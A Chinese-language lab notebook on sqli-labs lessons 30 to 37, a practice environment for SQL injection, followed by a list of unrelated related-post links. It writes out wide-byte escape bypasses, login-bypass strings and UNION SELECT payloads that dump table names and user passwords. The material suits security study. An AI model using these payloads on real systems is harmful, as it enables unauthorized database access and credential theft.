DAY 6

sqli-labs lesson 30

  • 与上一题一样,需要用到HPP
  • 查看源代码,参数两边加上了双引号,直接使用lesson 26a与lesson 27a的脚本即可

sqli-labs lesson 31

  • 闭合符号为双引号加括号
  • 直接报错型注入

sqli-labs lesson 32(Jsp)

  • 这一题直接用Jsp处理的一个参数即可
  • 闭合符号为单引号与括号,直接报错注入

sqli-labs lesson 32(php)

  • 宽字节注入:https://www.cnblogs.com/xishaonian/p/6063961.html
  • 思路:由源码,这道题过滤单引号,并且形成’这样的字符,所以我们的想法就是把\“吃掉”或者在他前面再加一个\。'的十六进制为0x5c,0x25所以URL编码为%5c%27,可以在前面加一个%df,形成%df%5c%27,也就是输入参数时,提交%df%27,过滤后形成三个字符,这三个字符在SQL中,因为编码设置为GBK,所以前面两个%df%5c会形成一个汉字,这样,%27就独立出来了。
  • 其他的直接使用联合查询语句即可

sqli-labs lesson 33

  • addslashes():

    addslashes() 函数在指定的预定义字符前添加反斜杠。这些字符是单引号(’)、双引号(")、反斜线(\)与NUL(NULL字符)。

  • 和上一题一样

sqli-labs lesson 34

  • 这一关是POST方式
  • 用户名输入:饜’ or 1=1#
  • 其中饜是utf-16位995c的汉字,分成其中5c转换成utf-8就是\,相当于我们在\之前又加了一个\来让他失效了

sqli-labs lesson 35

  • 爆库:?id=99 UNION SELECT 1,database(),3;–+
  • 爆表:?id=99 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121);–+
  • 爆字段:?id=99 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121) and table_name=CHAR(117, 115, 101, 114, 115);–+
  • 爆记录:?id=99 UNION SELECT 1,group_concat(username),group_concat(password) from security.users;–+

sqli-labs lesson 36

  • 宽字节注入,这次用FEFF335c,这是一个有意思的字符,长的这个样子:㍜
  • 检测:?id=99㍜’ UNION SELECT 1,2,3;–+
  • 其他引号用CHAR()函数绕过

sqli-labs lesson 37

  • 和上一题一样,只不过这次是POST
  • 用户名:㍜’ or 1=1;#

sqli-labs学习笔记 DAY6的更多相关文章

  1. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  2. python学习笔记-Day6(3)

    代码书写原则: 1)不能重复写代码 2)写的代码要经常变更 编程模式概述 面向过程:根据业务逻辑从上到下写垒代码 函数式:将某功能代码封装到函数中,日后便无需重复编写,仅调用函数即可 面向对象:对函数 ...

  3. python学习笔记-Day6(2)

    xml处理模块 xml是实现不同语言或程序之间进行数据交换的协议,跟json差不多,但json使用起来更简单,不过,古时候,在json还没诞生的黑暗年代,大家只能选择用xml呀,至今很多传统公司如金融 ...

  4. python学习笔记-Day6(1)

    shelve模块是一个简单的k,v将内存数据通过文件持久化的模块,可以持久化任何pickle可支持的python数据格式 >>> s=shelve.open('test') > ...

  5. 学习笔记day6:CSS3动画属性

    总结: 1: CSS动画:@keyframes  animation:ie10+:加-webkit前缀: animation 则是属于关键帧动画的范畴; 它本身被用来替代一些纯粹表现的javascri ...

  6. 学习笔记day6:position index结合

    z-index属性适用于定位元素(position 属性值为 relative 或 absolute 或 fixed的对象),用来确定定位元素在垂直于显示屏方向(称为Z轴)上的层叠顺序(stack o ...

  7. JS学习笔记Day6

    一.数组 1.数组就是个容器,里面可以存放任意类型的数 2.定义数组:1)var arr = []: 2)var arr = new Array():构造函数定义方式,如果括号中有一个整数,该正数代表 ...

  8. HTML学习笔记Day6

    一.元素类型 1.元素类型分类依据和元素类型分类 根据css显示分类,XHTML元素被分为三种类型:块状元素.内联元素.行内块元素.可变元素 2.块状元素 1)块状元素在网页中就是以块的形式显示,所谓 ...

  9. Python学习笔记 - day6 - 函数

    函数 函数在编程语言中就是完成特定功能的一个词句组(代码块),这组语句可以作为一个单位使用,并且给它取一个名字.可以通过函数名在程序的不同地方多次执行(这叫函数的调用).函数在编程语言中有基本分为:预 ...

随机推荐

  1. linux centos 7.5下 源码编译安装 lua环境

    lua 5.3.5 下载安装时发现缺少库 readline 需要添加依赖 yum search readline 看有哪些包 安装带有 devel 字样的 安装无 devel 的非开发包,通常不会自动 ...

  2. 【转】Android 4.0 Launcher2源码分析——启动过程分析

    Android的应用程序的入口定义在AndroidManifest.xml文件中可以找出:[html] <manifest xmlns:android="http://schemas. ...

  3. Jmeter之post上传文件

    上周五东西都收拾好了,然后被叫住加班,直接搞到凌晨一两点,原因是另一个项目的性能出了点问题.为此我抓包写了一下主业务流的接口,涉及到文件上传,记录一下吧. 一.创建线程组,添加各类组件 这个就不用说了 ...

  4. 七、Delphi10.3读取JSON数组

    一.Delphi读取JSON数组是非常方便的,首先我们网上找一段JSON数据 { "error": 0, "status": "success&quo ...

  5. 用NI的数据采集卡实现简单电子测试之4——半导体温度传感器

    本文从本人的163博客搬迁至此. 为了展示NImax(Measurement & Automation explorer)的强大配置功能,做了一个半导体温度传感器测试的示例. 一.半导体温度传 ...

  6. VIM - visual selection 模式下的简单操作

    1. 概述 vim 的 visual selection 模式下的简单操作 2. visual selection 模式 概述 可视化选择 可视化选择 vim 的一种专门用来选择的模式 可以提供相对于 ...

  7. 对Oracle的游标进行更为精细的控制

    摘要自 Oracle性能控制艺术 DECLARE l_ename emp.ename%TYPE :='SCOTT'; l_empno emp.empno%TYPE; l_cursor INTEGER; ...

  8. Masonry的简单使用(一)

    Masonry的简单使用(一) 一.新建工程 二.导入Masonry,可从我的GitHub上获取"Masonry":https://github.com/sycFuture/Mas ...

  9. CSS快速入门-后端布局

    一.后台框架概述 我们在网上随便搜索后台框架,你会发现大部分都查不多.正所谓:好看的皮囊千篇一律,有趣的灵魂万里挑一. 第一个是H-ui,H-ui.admin是用H-ui前端框架开发的轻量级网站后台模 ...

  10. 浅谈__dict__

    类的 __dict__ 先看一个例子: > class A(object): pass > ... > A.__dict__ dict_proxy({'__dict__': < ...